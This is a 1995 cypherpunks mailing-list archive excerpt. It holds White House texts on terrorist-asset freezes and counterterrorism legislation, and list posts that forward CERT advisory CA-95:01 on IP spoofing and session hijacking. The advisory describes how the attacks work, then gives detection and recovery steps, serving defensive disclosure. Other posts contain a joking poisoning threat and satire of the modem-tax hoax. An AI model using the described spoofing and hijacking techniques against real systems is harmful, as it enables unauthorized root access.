  strategic and advanced conventional weapons and are 
  from diverse backgrounds.  The President shall 
  designate one of the members as Chairperson of the 
  Board.
  
       Sec. 2.  Functions.  The Board shall advise the 
  President on implementation of United States 
  conventional arms transfer policy, other issues 
  related to arms proliferation policy, and on other 
  matters deemed appropriate by the President.  The 
  Board shall report to the President through the 
  Assistant to the President for National Security 
  Affairs.
  
       Sec. 3.  Administration.  (a) The heads of 
  executive agencies shall, to the extent permitted by 
  law, provide to the Board such information as it may 
  require for the purpose of carrying out its 
  functions.
  
       (b) Members of the Board shall serve without 
  compensation, but shall be allowed travel expenses, 
  including per diem in lieu of subsistence, as 
  authorized by law, including 5 U.S.C. 5701-5707 and 
  section 7(d) of the Act, for persons serving 
  intermittently in government service.
  
       (c) The Department of Defense or the head of any 
  other Federal department or agency may detail to the 
  Board, upon request of the Chairperson of the Board, 
  any of the personnel of the department or agency to 
  assist the Board in carrying out its duties.  
  
       (d) The Secretary of Defense shall designate a 
  federally funded research and development center with 
  expertise in the matters covered by the Board to 
  provide the Board with such support services as the 
  Board may need to carry out its duties.
  
       (e) The Department of Defense shall provide the 
  Board with administrative services, facilities, 
  staff, and other support services necessary for the 
  performance of its functions.

       Sec. 4.  General.  (a) The Board shall terminate 
  30 days after the date on which the President submits 
  the final report of the Board to the Congress.
  
       (b) For reasons of national security or for such 
  other reasons as specified in section 552(b) of 
  title 5, United States Code, the Board shall not 
  provide public notice or access to meetings at which 
  national security information will be discussed.  
  Authority to make such determinations shall reside 
  with the Secretary of Defense or his designee who 
  must be an official required to be appointed by and 
  with the advice and consent of the Senate.
  
       (c) Information made available to the Board 
  shall be given all necessary security protection in 
  accordance with applicable laws and regulations.
  
       (d) Each member of the Board and each member of 
  the Board's staff shall execute an agreement not to 
  reveal any classified information obtained by virtue 
  of his or her service with the Board except as 
  authorized by applicable law and regulations.
  
  
  
  
       	    	      	   	     WILLIAM J. CLINTON
  



                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release                January 24, 1995
  
  
  TO THE CONGRESS OF THE UNITED STATES:
  
  
       Pursuant to section 204(b) of the International 
  Emergency Economic Powers Act, 50 U.S.C. 1703(b) and 
  section 301 of the National Emergencies Act, 50 
  U.S.C. 1631, I hereby report that I have exercised my 
  statutory authority to declare a national emergency 
  with respect to the grave acts of violence committed 
  by foreign terrorists that threaten to disrupt the 
  Middle East peace process and to issue an Executive 
  order that:
  
  	    Blocks all property, including bank 
            deposits, of foreign persons or 
            organizations designated in the Executive 
            order or pursuant thereto, which is in the 
            United States or in the control of United 
            States persons, including their overseas 
            branches; and
  
  	    Prohibits any transaction or dealing by 
            United States persons in such property, 
            including the making or receiving of any 
            contribution of funds, goods, or services 
            to or for the benefit of such designated 
            persons.
  
       I have designated in the Executive order 
  12 foreign organizations that threaten to use 
  violence to disrupt the Middle East peace process.  I 
  have authorized the Secretary of State to designate 
  additional foreign persons who have committed, or 
  pose a significant risk of committing, acts of 
  violence that have the purpose or effect of 
  disrupting the Middle East peace process, or who 
  assist in, sponsor, or provide financial, material or 
  technological support for, or services in support of, 
  such acts of violence.  Such designations are to be 
  made in coordination with the Secretary of the 
  Treasury and the Attorney General.
  
       The Secretary of the Treasury is further 
  authorized to designate persons or entities that he 
  determines, in coordination with the Secretary of 
  State and the Attorney General, are owned or 
  controlled by, or acting for or on behalf 
  of, any of the foreign persons designated under this 
  order.  The Secretary of the Treasury is also 
  authorized to issue regulations in exercise of my 
  authorities under the International Emergency 
  Economic Powers Act to implement these measures in 
  consultation with the Secretary of State and the 
  Attorney General and to coordinate such 
  implementation with the Federal Bureau of 
  Investigation.  All Federal agencies are directed to 
  take actions within their authority to carry out the 
  provisions of the Executive order.
  
       I am enclosing a copy of the Executive order 
  that I have issued.  The order was effective at 12:01 
  a.m., eastern standard time on January 24, 1995.
  
       I have authorized these measures in response to 
  recurrent acts of international terrorism that 
  threaten to disrupt the Middle East peace process.  
  They include such acts as the bomb attacks in Israel 
  this past weekend and other recent attacks in Israel, 
  attacks on government authorities in Egypt, threats 
  against Palestinian authorities in the autonomous 
  regions, and the bombing of the Jewish Mutual 
  Association building in Buenos Aires, as well as the 
  car bomb at the Israeli Embassy in London.

       Achieving peace between Israel and its neighbors 
  has long been a principal goal of American foreign 
  policy.  Resolving this conflict would eliminate a 
  major source of instability in a part of the world in 
  which we have critical interests, contribute to the 
  security and well-being of Israel, and strengthen 
  important bilateral relationships in the Arab world.
  
       Attempts to disrupt the Middle East peace 
  process through terrorism by groups opposed to peace 
  have threatened and continue to threaten vital 
  interests of the United States, thus constituting an 
  unusual and extraordinary threat to the national 
  security, foreign policy, and economy of the United 
  States.
  
       Terrorist groups engaging in such terrorist acts 
  receive financial and material support for their 
  efforts from persons in the Middle East and elsewhere 
  who oppose that process.  Individuals and groups in 
  the United States, too, have been targets of 
  fundraising efforts on behalf of terrorist 
  organizations.
  
       Fundraising for terrorism and use of the U.S. 
  banking system for transfers on behalf of such 
  organizations are inimical to American interests.  
  Further, failure to take effective action against 
  similar fundraising and transfers in foreign 
  countries indicate the need for leadership by the 
  United States on this subject.  Thus, it is necessary 
  to provide the tools to combat any financial support 
  from the United States for such terrorist activities.  
  The United States will use these actions on our part 
  to impress on our allies in Europe and elsewhere the 
  seriousness of the danger of terrorist funding 
  threatening the Middle East peace process, and to 
  encourage them to adopt appropriate and effective 
  measures to cut off terrorist fundraising and the 
  harboring of terrorist assets in their territories 
  and by their nationals.
  
       The measures we are taking demonstrate our 
  determination to thwart acts of terrorism that 
  threaten to disrupt the Middle East peace process by 
  attacking any material or financial support for such 
  acts that may emanate from the United States.
  
  
  
  
       	    	      	   	     WILLIAM J. CLINTON
  
  
  
  
  THE WHITE HOUSE,
      January 23, 1995.
  
  
  
  
                         #  #  #
  


                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release                                   January 24, 1995

                         BACKGROUND BRIEFING
                                  BY
                   SENIOR ADMINISTRATION OFFICIALS


                          The Briefing Room


2:14 P.M. EST

[I've cut out 90% of this.  E-mail me if you want a complete copy -bd]
	     

[...]	     On October 24th, at his speech at Georgetown University 
on the peace process, Secretary Christopher mentioned our concern 
about this and said that we are looking at a number of options to 
address both the funding threat and to strengthen our 
counterterrorism activities in other ways.  And this executive order 
and the package of laws are a result of that.
	     
	     These are only part of a much larger effort that the 
administration has been making to counter terrorism around the world.
The executive order will also support the efforts which we have been 
making now for a long time to encourage similar efforts by foreign 
governments to prevent funding from their countries to these 
terrorist organizations.  By blocking transfers to these terrorist 
groups and individuals and by freezing accounts, while we are not 
certain about the volume of funds that we will seize or stop, we know 
that we are sending a very powerful message to potential donors by 
criminalizing this activity.
	     
	     The executive order, as you know, designates 12 
terrorist organizations.  We have a very large body of public and 
intelligence information which documents terrorist acts by these 
organizations going way back.  And it also designates 18 individuals 
who are associated with these groups.  The process provides an 
opportunity to designate additional groups and additional individuals 
as we work our way through this.  [...]
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Thank you.  Good 
afternoon.  The legislation that has been drafted is designed to 
strengthen our ability not only to deter terrorist acts, but to also 
punish those who engage in such terrorism.  It is a comprehensive 
bill that we have compiled.  It is still being worked on.  We will be 
working closely with the Hill to perfect it, and it has multiple 
provisions, but I'd like to highlight, at this point, essentially 
five broad areas, many of which are designed to ensure, among other 
things, that this country is not used as a base of operations for 
terrorist acts abroad.
	     
	     To begin with, it creates a new federal statute which 
would provide clear federal jurisdiction for any international 
terrorist act committed in the United States.  As many of you know, 
this has been a particularly critical point, especially in light of 
various events in the United States and highlighted the question of 
the existing scope of federal jurisdiction.
	     
	     We also have provisions in the draft criminalizing 
conspiracies in the United States to engage in terrorist acts 
committed outside the United States.  This is an extension of the 
Material Support Act and is critical, I think, for ensuring that the 
United States is not, as I said, used as a launching pad for 
terrorist attacks anywhere in the world.
	     
	     Another provision which we think is critical is to 
provide expedited deportation proceedings for aliens who engage in 
terrorist activities and to expedite their removal from the United 
States.  
	     
	     The fourth provides a comprehensive mechanism for 
preventing fundraising in the United States in support of 
international terrorist activities overseas.
	     
	     And the fifth is designed to facilitate the 
investigation of matters involving explosives, and implements 
recently concluded international convention for ensuring that 
explosives contain "taggets," if you will, insertion of chemical 
agents into plastic explosives, which will make them more detectible 
and facilitate investigation.
	     
	     As I said, there are other provisions of the bill, which 
are critical.  They're more of a technical nature, and would, in 
fact, greatly facilitate investigation, prosecution and enhance the 
range of the sanctions that can be applied.
	     
	     At this point, we'd be glad to take questions. [...]

[SENIOR ADMINISTRATION ASSHO...er...OFFICIAL...]	     	     
	     The legislation we propose will contain other devices, 
if you will, to facilitate the investigations. 
	     
	     Q	  Like wire-tapping?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  A variety, yes.  There 
will be certain provisions.
	     
	     Q	  Isn't that against the Constitution?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Oh, no, of course not.  
I mean, appreciate that we have a variety of existing, statutorily 
approved mechanisms.  We are trying to, consistent with 
constitutional requirements, be able to afford ourselves the widest 
range of enforcement opportunities.  Now, that is not being designed 
to, in any way, circumvent or deprive people of constitutional 
protections.  But on the other hand, to the extent that wire-tap 
authority would facilitate investigations in this area, yes, we would 
like authority.  But I'm saying that this is just one opportunity, if 
you will, for dealing with the problem of fundraising. [...]
	     

	     Q	  I'll try to keep it short.  Wire-tapping still with 
the judge's prior approval?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Yes.
	     
	     Q	  Okay, you can eliminate hearings now, the right of 
somebody to have a hearing before he's deported, are you going to try 
to shortcut that?  And, third, what about the right to associate so 
far as going to a mosque and contributing to a -- you're really 
touching on constitutional rights, and you know it as well as I do.
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Let me take issue with 
your characterization.  No, we're not touching -- obviously, the 
legislation in this area has to be drafted with tremendous 
sensitivity to those issues, and I think we have.  We have, in fact, 
brought to bear great concerns about civil liberties of Americans and 
non-Americans in this country, and what we have designed, I would 
suggest to you, you will see is consistent with those constitutional 
limitations. 
	     
	     But on the other hand, as the court has repeatedly said, 
Constitution is not a suicide pact.  It does permit us to move 
aggressively in this area consistent with the Constitution to be able 
to protect ourselves and our vital national security.
	     
	     Now, with respect to this wire-tapping, all we're 
suggesting, among other things, is to take existing authority, which 
now has an articulation of a whole range of offenses, that permits 
legal wiretapping, and add terrorism to it.  Okay?  
	     
	     As far as deportations -- deportations, what we want in 
connection with terrorism is a methodology consistent with 
constitutional limitations to enable us to expedite the deportation 
process, utilizing federal district courts and federal district 
judges and to have a mechanism -- have a mechanism so that to the 
extent that we have to rely on classified information --
	     
	     Q	  Closed courts, closed hearings?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  No, no.  Public 
hearings, procedures consistent with the same procedures utilize din 
criminal cases to ensure the protection of classified information, 
consistent with constitutional limitations.  That is what we are 
proposing.  [...]
	     
	     Q	  Is the CIA obligated under this Executive Order to 
help you and State and the rest with regard to intelligence on these 
various groups that might be funneling money to eventual terrorists?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  The CIA and other 
American intelligence agencies are a full partner in this process, 
and their work overseas and the work of the FBI here at home is 
essential to make this work.  And they're anxious to help, and they 
are helping.
	     
	     Q	  There's a broad paragraph in the order that talks 
about other federal agencies without naming them, and that's why I 
asked the question, whether that is the paragraph that brings the CIA 
into the picture. [...]
	     	     
	     Q	  What if somebody is caught in this and claims to be 
innocent, that they're involved in truly humanitarian efforts?  Do 
they have to sue the federal government to get access to their funds?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  No, there are appeal 
procedures -- this has happened obviously much before -- we have a 
lot of experience in this program.  We have appeal procedures, people 
would apply to the Treasury Department Office of Foreign Assets 
Control, and there are appeal mechanisms in place.  There are 
obviously always judicial avenues, but there are nonjudicial avenues 
as well -- administrative avenues to work this out.
	     






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 25 Jan 95 20:05:48 PST
To: datadec@cs.UCR.edu (Kevin Marcus)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <m0rXGoq-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> > <Obviously still irritated that companies think (or know...) that
> > they can eek out more money by reinventing instead of refurbishing
> > or augmenting something flexible enough to do anything they want.
> > Face it: there is nothing I can't add to a Unix system, and it wouldn't
> > have to affect existing programs one bit.>
> 
> Unfortunately, however, there are a lot of things that a lot of people can't
> do in a unix system.  Unix is probably the most widely used unfriendly
> cryptic, and complicated operating system today.  With the upcoming of
> Linux, this will probably change somewhat in the future, but until I can
> teach my secretary how she can use latex to type and print her letters, we
> are going to be stuck with getting us whatever the bastards at MicroSoft
> think we want.
> 

While in a way what you say is true, latex isn't Unix, the shell isn't the
only interface to Unix, etc.  Unixware's setup was an example.  Solaris's
isn't too bad (setup printers, mounts, user accounts, ttys (kinda)), etc.
Put Frame, WP, MS Word (some version at least), Lotus 123, Powerbuilder
(was going to be out end 94, haven't kept track), etc. on a Unix
system that boots to xdm and you have a pretty darn good replacement
for Windows/NT/OS2, etc.

With any kind of support staff, Unix systems are much smoother and robust
than PCs.  I've seen it at several really large sites.  No comparison.

Ok, I guess I'm getting 'religious' here, which isn't the place...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Wed, 25 Jan 95 21:20:18 PST
To: cypherpunks@toad.com
Subject: <none specified>
Message-ID: <199501260516.AAA17150@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My appologies if this has already made it to the list.

In article <D2wtJC.C8I@freenet.carleton.ca> you wrote:

: In a previous posting, Farrell McGovern (ai474@FreeNet.Carleton.CA) writes:
: > 	CNN Headline news this morning is running a story saying how the
: > Internet is so innsecure that "hackers" can access former VP Quale's
: > medical records, number of atomic warheads in a certain state and CIA's
: > budget. And all ths is supposedly based upon a "breakthrough" that
: > "hackers" have made recently. They say that the Internet will not be able
: > to be secure for at least 5 years.

: 	Here's more about it!

:  
: Article #36 (36 is last):
: Newsgroups: comp.security.announce
: From: ecd@why.cert.org (Edward DeHart)
: Subject: IP Spoofing Attacks and Hijacked Terminal Connections
: Date: Mon Jan 23 16:00:37 1995
: =============================================================================
: CA-95:01                         CERT Advisory
:                                 January 23, 1995
:                 IP Spoofing Attacks and Hijacked Terminal Connections
: -----------------------------------------------------------------------------
: The CERT Coordination Center has received reports of attacks in which
: intruders create packets with spoofed source IP addresses. These attacks
: exploit applications that use authentication based on IP addresses. This
: exploitation leads to user and possibly root access on the targeted system.
: Note that this attack does not involve source routing. Recommended solutions
: are described in Section III below.
: In the current attack pattern, intruders may dynamically modify the kernel of
: a Sun 4.1.X system once root access is attained.  In this attack, which is
: separate from the IP spoofing attack, intruders use a tool to take control of
: any open terminal or login session from users on the system. Note that
: although the tool is currently being used primarily on SunOS 4.1.x systems,
: the system features that make this attack possible are not unique to SunOS.
:  
: As we receive additional information relating to this advisory, we will place
: it, along with any clarifications, in a CA-95:01.README file. CERT advisories
: and their associated README files are available by anonymous FTP from
: info.cert.org. We encourage you to check the README files regularly for
: updates on advisories that relate to your site.
:  
: -----------------------------------------------------------------------------
:  
: I.   Description
:  
:      This description summarizes both the IP spoofing technique that can
:      lead to root access on a system and the tool that intruders are using to
:      take over open terminal and login connections after they get root access.
:      We are currently seeing attacks in which intruders combine IP spoofing
:      with use of the tool. However, these are two separate actions. Intruders
:      can use IP spoofing to gain root access for any purpose; similarly, they
:      can highjack terminal connections regardless of their method of gaining
:      root access.
:  
:      IP spoofing
:         To gain access, intruders create packets with spoofed source IP
:         addresses. This exploits applications that use authentication
: based on
:         IP addresses and leads to unauthorized user and possibly root access
:         on the targeted system. It is possible to route packets through
:         filtering-router firewalls if they are not configured to filter
:         incoming packets whose source address is in the local domain. It
:         is important to note that the described attack is possible even if
:         no reply packets can reach the attacker.
:  
:         Examples of configurations that are potentially vulnerable include
:         - routers to external networks that support multiple internal
:           interfaces
:         - routers with two interfaces that support subnetting on the
:           internal network
:         - proxy firewalls where the proxy applications use the source
:           IP address for authentication
:  
:         The IP spoofing attacks we are currently seeing are similar to those
:         described in two papers: 1) "Security Problems in the TCP/IP Protocol
:         Suite" by Steve Bellovin, published in _Computer Communication Review_
:         vol. 19, no. 2 (April 1989) pages 32-48; 2) "A Weakness in the 4.2BSD
:         Unix TCP/IP Software" by Robert T. Morris. Both papers are available
:         by anonymous FTP from
:  
:            ftp.research.att.com:/dist/internet_security
:  
:            Bellovin paper: ipext.ps.Z
:            Morris paper:   117.ps.Z
:  
:         Services that are vulnerable to the IP spoofing attack include
:            SunRPC & NFS
:            BSD UNIX "r" commands
:            anything wrapped by the tcp daemon wrappers - site dependent; check
:                your configuration
:            X windows
:            other applications that use source IP addresses for authentication
:  
:      Hijacking tool
:         Once the intruders have root access on a system, they can use a tool
:         to dynamically modify the UNIX kernel. This modification allows them
:         to hijack existing terminal and login connections from any user on the
:         system.
:  
:         In taking over the existing connections, intruders can bypass one-time
:         passwords and other strong authentication schemes by tapping the
:         connection after the authentication is complete. For example, a
:         legitimate user connects to a remote site through a login or terminal
:         session; the intruder hijacks the connection after the user has
:         completed the authentication to the remote location; the remote site
:         is now compromised. (See Section I for examples of vulnerable
:         configurations.)
:  
:         Currently, the tool is used primarily on SunOS 4.1.x systems. However,
:         the system features that make this attack possible are not unique to
:         SunOS.
:  
:  
: II. Impact
:  
:      Current intruder activity in spoofing source IP addresses can lead to
:      unauthorized remote root access to systems behind a filtering-router
:      firewall.
:  
:      After gaining root access and taking over existing terminal and login
:      connections, intruders can gain access to remote hosts.
:  
:  
: III. Solutions
:  
:      A. Detection
:  
:         IP spoofing
:            If you monitor packets using network-monitoring software such as
:            netlog, look for a packet on your external interface that has
:            both its source and destination IP addresses in your local domain.
:            If you find one, you are currently under attack. Netlog is
:            available by anonymous FTP from
:               net.tamu.edu:/pub/security/TAMU/netlog-1.2.tar.gz
:               MD5 checksum: 1dd62e7e96192456e8c75047c38e994b
:  
:            Another way to detect IP spoofing is to compare the process
:            accounting logs between systems on your internal network. If
:            the IP spoofing attack has succeeded on one of your systems,
:            you may get a log entry on the victim machine showing a remote
:            access; on the apparent source machine, there will be no
:            corresponding entry for initiating that remote access.
:  
:         Hijacking tool
:            When the intruder attaches to an existing terminal or login
:            connection, users may detect unusual activity, such as commands
:            appearing on their terminal that they did not type or a blank
: window
:            that will no longer respond to their commands. Encourage your users
:            to inform you of any such activity. In addition, pay particular
:            attention to connections that have been idle for a long time.
:  
:            Once the attack is completed, it is difficult to detect. However,
:            the intruders may leave remnants of their tools. For example, you
:            may find a kernel streams module designed to tap into existing TCP
:            connections.
:  
:      B. Prevention
:  
:         IP spoofing
:            The best method of preventing the IP spoofing problem is to install
:            a filtering router that restricts the input to your external
:            interface (known as an input filter) by not allowing a packet
:            through if it has a source address from your internal network. In
:            addition, you should filter outgoing packets that have a source
:            address different from your internal network in order to prevent
:            a source IP spoofing attack originating from your site.
:  
:            The following vendors have reported support for this feature:
:              Bay Networks/Wellfleet routers, version 5 and later
:              Cabletron - LAN Secure
:              Cisco - RIS software all releases of version 9.21 and later
:              Livingston - all versions
:  
:            If you need more information about your router or about firewalls,
:            please contact your vendor directly.
:  
:            If your vendor's router does not support filtering on the inbound
:            side of the interface or if there will be a delay in incorporating
:            the feature into your system, you may filter the spoofed IP packets
:            by using a second router between your external interface and your
:            outside connection. Configure this router to block, on the outgoing
:            interface connected to your original router, all packets that
: have a
:            source address in your internal network. For this purpose, you can
:            use a filtering router or a UNIX system with two interfaces that
:            supports packet filtering.
:  
:            NOTE: Disabling source routing at the router does not protect you
:                  from this attack, but it is still good security practice to
:                  do so.
:  
:         Hijacking tool
:            There is no specific way to prevent use of the tool other than
:            preventing intruders from gaining root access in the first place.
:            If you have experienced a root compromise, see Section C for
: general
:            instructions on how to recover.
:  
:      C. Recovery from a UNIX root compromise
:  
:         1. Disconnect from the network or operate the system in
:            single-user mode during the recovery.  This will keep users
:            and intruders from accessing the system.
:  
:         2. Verify system binaries and configuration files against the
:            vendor's media (do not rely on timestamp information to
:            provide an indication of modification).  Do not trust any
:            verification tool such as cmp(1) located on the compromised
:            system as it, too, may have been modified by the intruder.
:            In addition, do not trust the results of the standard UNIX
:            sum(1) program as we have seen intruders modify system
:            files in such a way that the checksums remain the same.
:            Replace any modified files from the vendor's media, not
:            from backups.
:                                 -- or --
:  
:            Reload your system from the vendor's media.
:  
:         3. Search the system for new or modified setuid root files.
:  
:                 find / -user root -perm -4000 -print
:  
:            If you are using NFS or AFS file systems, use ncheck to
:            search the local file systems.
:  
:                 ncheck -s /dev/sd0a
:  
:         4. Change the password on all accounts.
:  
:         5. Don't trust your backups for reloading any file used by
:            root.  You do not want to re-introduce files altered by an
:            intruder.
:  
: ---------------------------------------------------------------------------
: The CERT Coordination Center thanks Eric Allman, Steve Bellovin, Keith Bostic,
: Bill Cheswick, Mike Karels, and Tsutomu Shimomura for contributing to our
: understanding of these problems and their solutions.
: ---------------------------------------------------------------------------
:  
: If you believe that your system has been compromised, contact the CERT
: Coordination Center or your representative in Forum of Incident
: Response and Security Teams (FIRST).
:  
: If you wish to send sensitive incident or vulnerability information to
: CERT staff by electronic mail, we strongly advise that the e-mail be
: encrypted.  The CERT Coordination Center can support a shared DES key, PGP
: (public key available via anonymous FTP on info.cert.org), or PEM (contact
: CERT staff for details).
:  
: Internet E-mail: cert@cert.org
: Telephone: +1 412-268-7090 (24-hour hotline)
:            CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4),
:            and are on call for emergencies during other hours.
: Fax: +1 412-268-6989
:  
: CERT Coordination Center
: Software Engineering Institute
: Carnegie Mellon University
: Pittsburgh, PA 15213-3890
: USA
:  
: Past advisories, CERT bulletins, information about FIRST representatives,
: and other information related to computer security are available for anonymous
: FTP from info.cert.org.
:  
:  
:  
: CERT is a service mark of Carnegie Mellon University.
:  
: -------------------------------

: --
: ------------------------------------------------------------------------
: The Information Cowpath is strewn with Meadow Muffins...even the best of
: us get the Meadow Muffin Blues every now and then...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLycwFyoZzwIn1bdtAQH7lQGAqGZx0JupR5oLwwm9wcJkhwZLks3Y1y36
4F9UjunJWFS4sKbts6eLkAT3jakXpTXT
=3rGy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Thu, 26 Jan 95 01:39:42 PST
To: nobody@rahul.net
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <Pine.SUN.3.91.950126012920.11763F-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 25 Jan 1995 nobody@rahul.net wrote:

> sorr@eznet.net wrote:
> 
> > To whomever:
> >   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> > story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> > address was used by a person who broke into the San Diego supercomputer center 
> > a month ago. What's toad.com? I got your name from a web search that found an 
> > old communique.
> >   Can you be any help? I'm simply trying to reconstruct what happened.
> > Steve Orr
> > Gannett Rochester Newspapers
> 
> Fuck Gannett.
> 
I'm afraid that  `nobody' is imperfect.

This reporter, who probably knows little about the Internet or any of the 
issues under discussion except what he has read in the press, has posted 
a presumably sincere request for information.  He is  *asking* to learn 
-- at the precise moment when serious threats to our freedom of 
expression are mounting in force -- and you answer by spitting in his face.
Believe me, those who wish to shut us down and shut us up will be happy 
to talk to him.

And, nobody, the article he writes will help to shape the popular 
conception of what this net is all about; and that conception, in the 
end, will determine its fate.

So I hope that someone else on this list will favor him with a politer 
and more informative answer to his question.

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 25 Jan 95 22:39:23 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <Pine.SUN.3.91.950125210658.29117A-100000@unix2.netaxs.com>
Message-ID: <199501260638.BAA07072@duke.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| 	I have literally hundreds of messages archived from the CP list of
| several months back where Eric Hughes repeatedly states that reordering,
| not latency, is the key. Reordering of a sufficient magnitude will
| introduce latency inherently. Otherwise you are still vulnerable to 
| traffic analysis (which is an art, not a science, remember).

	Are you sure TA is still an art?  The NSA has (presumably)
spent thousands of man years on the problem.  Hal, Wei Dai and others
have done some very good work.  While I've only skimmed the surface of
it, its clear that clever statistical work comprises a lot of TA.  It
may be that the FBI has a couple of Suns handling the whole remailer
network right now.

	Also, if anyone wants to lok at the archives, the best thread
is subject reordering vs. latency.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 25 Jan 95 16:42:01 PST
To: cypherpunks@toad.com
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
Message-ID: <199501260041.AA11547@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


>  	But, but... I heard that new members of BlackNet have to
>  kill a driver who flashes their headlights at them, as part
>  of an initiation rite. I know it's true: Klaus! told me so in
>  private e-mail. Is there any verification of this? I'm frightened...

If any more of this non-cypherpunks related stuff turns up on the list those responsible will be fed "Blue Star", "Sad Clown", and "Bart Simpson" blotter acid (free samples available at your local playground) till they die of strychnine poisoning!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Wed, 25 Jan 95 19:01:39 PST
To: cypherpunks@toad.com
Subject: RE:sorr
Message-ID: <199501260302.DAA18137@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

sorr@eznet.net wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> address was used by a person who broke into the San Diego supercomputer 
center 
> a month ago. What's toad.com? ....I'm simply trying to reconstruct..

someone wrote anonymously:
> Fuck Gannett.

 L. Futplex McCarthy wrote:
>This belongs in private email, assuming that isolated epithets are worth
sharing with anyone outside your primal scream therapy group. 
  Are you related to Detweiler, perchance ?
 

etc,etc.
  Yep - A shame about being anonymous...because it was succinctly put - 
  but explanations to Steve Orr unnecessary - surely? Nevertheless, I'm
  glad it was said,
                   Keith Cross
  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLycKfhZrmpTDhsYFAQHxpgQApvnrBVvnR6CzwF9t5dPYnsPu+laI3Q50
xNTdC3GInnBUXWscf9V/5mPETFUC8Pv+YG+umwHP1fxsnVG+yooRQvy7Vh4gyqvK
zB64Jsc+HLLRiee1vnczZ0kaBZJn6ajCzmGpJ1Q5Pof+GD4OirO9pZAAeUz88tPv
2EIFOxuT8z0=
=c7cc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Thu, 26 Jan 95 02:25:13 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
In-Reply-To: <199501251947.LAA04536@netcom3.netcom.com>
Message-ID: <Pine.3.89.9501260534.D23561-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain



Tim,

Would you happen to have his email address?

Regards,
Dave


On Wed, 25 Jan 1995, Timothy C. May wrote:

> Perry E. Metzger wrote:
> > 
> > 
> > Oh no! The modem tax urban legend comes around again!
> > 
> 
> 
> I am shocked at this proposed modem tax, along with the keyboard tax,
> the printer tax, the mouse tax, and the cable tax.
> 
> FCC Commissioner Craig Shergold has asked that comment on this modem
> tax be sent on post cards to him. He is hoping to receive more
> postcards than any previous FCC Commissioner.
> 
> His address is:
> 
> FCC Commissioner Craig T. Shergold
> Room 101
> Ministry of Truth
> 42 Oceania Street, NW
> Washington, D.C. 10666
> 
> In a related note, opponents of this modem tax are encouraged to flash
> their headlights at oncoming traffic.
> 
> --Tim May
> 
> -- 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,  
> tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
>                        | knowledge, reputations, information markets, 
> W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
> Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
> Cypherpunks list: majordomo@toad.com with body message of only: 
> subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay
> 
> 
> 

___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XF4D9F5C5          > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
